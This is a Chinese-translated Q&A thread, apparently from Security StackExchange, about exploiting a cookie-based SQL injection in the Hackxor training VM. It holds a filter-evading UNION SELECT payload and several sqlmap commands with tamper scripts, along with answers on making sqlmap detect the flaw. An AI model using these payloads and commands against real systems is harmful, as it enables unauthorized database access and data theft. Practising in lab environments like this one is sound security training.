现在,我正在修改Hackxor VM (一种受限制的培训环境),并试图使用sqlmap来利用我可以手动利用的漏洞。
该漏洞位于cookie标头'userid‘参数中。该应用程序实现了一些SQLi过滤器来阻塞空间和一些SQL关键字,因此您必须稍微扭曲一下有效负载。
我可以成功地利用以下漏洞,使用HTTP代理在上述“userid”参数中注入以下有效负载:
71934/**/unUNIONion/**/seSELECTlect/**/*/**/from/**/users然后,我尝试用sqlmap复制注入,但没有成功,使用以下命令:
sqlmap -u "http://cloaknet:8080/proxypanel.jsp" --cookie="JSESSIONID=CA97BAFA78E01D237B86278E9DFE12C3; userid=71934" -p "userid" --level 5 --tamper "nonrecursivereplacement.py,space2comment.py" --sql-query="71934 UNION SELECT * from users"我希望sqlmap只注入给定的查询并返回一个成功的漏洞,但是sqlmap尝试了很多查询,最后返回了'userid‘参数,而不是易受攻击的。
我做错了什么?
发布于 2016-03-02 03:10:29
实际上我遇到了一个类似的问题。我认为我的语法是正确的,我仍然不知道我哪里出了问题,但我能够使用-r标志和提要sqlmap (捕获的header )作为参数。一旦我这样做,这个sqlmap就将该字段识别为易受攻击的区域(我已经知道它是脆弱的),并按照我最初的想法行事。
希望这能有所帮助!
发布于 2017-02-22 00:31:06
它需要这样工作
sqlmap -u "http://cloaknet:8080/proxypanel.jsp" --cookie="JSESSIONID=CA97BAFA78E01D237B86278E9DFE12C3; userid=71934" --level 5 --risk 3 -p "userid" --tamper=nonrecursivereplacement,space2comment --sql-query="71934 UNION SELECT * from users"https://security.stackexchange.com/questions/116192
复制相似问题